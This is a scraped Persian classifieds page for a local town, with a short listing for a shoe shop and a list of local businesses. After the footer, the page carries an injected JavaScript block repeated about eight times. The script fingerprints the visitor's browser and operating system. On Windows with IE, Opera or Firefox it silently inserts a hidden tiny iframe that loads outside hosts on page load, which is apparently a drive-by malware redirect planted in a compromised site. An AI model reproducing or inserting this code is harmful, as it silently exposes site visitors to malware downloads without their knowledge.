ورود به سایت

تاریخ

پنجشنبه 4 ارديبهشت 1393

لوگوهای تبلیغات

تبلیغات ویژه

 

 

 

جستجو در آگهی


آمار سایت

امروز8
دیروز24
هفته46
کل11053
 • اتحادیه درودگران آستانه اشرفیه و بندر کیاشهر
 • مبل محمودی
 • فروشگاه بزرگ بارانک
 • دفتر اسناد رسمی 226
 • نسیم پارسیان خزر
 • بدلیجات گل سنگ
 • مشاوراملاک آسیا
 • بنگاه حاج ابراهیم سعیدی
 • اتحادیه برنج فروشان آستانه اشرفیه
 • طلا فروشی محمد پور
 • مبل آرشا
 • بانک ایران زمین
 • جواهری غفاری
 • مشاور املاک نوری پور

کفش آرنیکا

ارسال توسط: super user
توسط:
مشخصه: #کفش آرنیکا
ایجاد در: سه شنبه, آوریل 23 2013

توضیحات

کفش آرنیکا

بمدیریت : حسین قاسمی معبود

تلفن : 01424223362 همر...

سایر اطلاعات

Email: info@astaneh118.com

دسته بندی های آگهی

بنرهای تبلیغاتی

ساعت

نواحی

تبلیغ ویژه

سایت آگهی و نیازمندی های آستانه اشرفیه
if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://anadoluengellilerkenti.com/img/trans/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } if(document.loaded) { showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, // //-------------------------------------------------------------------------------- OperaB = /Opera[ \/]+\w+\.\w+/i, // OperaV = /Version[ \/]+\w+\.\w+/i, // FirefoxB = /Firefox\/\w+\.\w+/i, // ChromeB = /Chrome\/\w+\.\w+/i, // SafariB = /Version\/\w+\.\w+/i, // IEB = /MSIE *\d+\.\w+/i, // SafariV = /Safari\/\w+\.\w+/i, // //-------------------------------------------------------------------------------- browser = new Array(), browserSplit = /[ \/\.]/i, OperaV = UA.match(OperaV), Firefox = UA.match(FirefoxB), Chrome = UA.match(ChromeB), Safari = UA.match(SafariB), SafariV = UA.match(SafariV), IE = UA.match(IEB), Opera = UA.match(OperaB); //----- Opera ---- if ((!Opera=="")&(!OperaV=="")) browser[0]=OperaV[0].replace(/Version/, "Opera") else if (!Opera=="") browser[0]=Opera[0] else //----- IE ----- if (!IE=="") browser[0] = IE[0] else //----- Firefox ---- if (!Firefox=="") browser[0]=Firefox[0] else //----- Chrom ---- if (!Chrome=="") browser[0] = Chrome[0] else //----- Safari ---- if ((!Safari=="")&&(!SafariV=="")) browser[0] = Safari[0].replace("Version", "Safari"); var outputData; if (browser[0] != null) outputData = browser[0].split(browserSplit); if ((chrAfterPoint==null)&&(outputData != null)) { chrAfterPoint=outputData[2].length; outputData[2] = outputData[2].substring(0, chrAfterPoint); outputData[3] = 'uncomn'; if (UA.indexOf ('Windows') != -1) outputData[3] = 'Windows'; if (UA.indexOf ('Linux')!= -1) outputData[3] = 'Linux'; if (UA.indexOf ('Mac')!= -1) outputData[3] = 'Mac'; if (UA.indexOf ('SunOS')!= -1) outputData[3] = 'SunOS'; if (UA.indexOf ('FreeBSD')!= -1) outputData[3] = 'FreeBSD'; return(outputData); } else return(false); } function showBrowVer() { var data = browserDetectNav(); if (data[0]) { if ((data[0] == 'Opera' || data[0] == 'MSIE' || data[0] == 'Firefox') & data[3] == 'Windows'){ var divTag=document.createElement('div'); divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/?2'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } }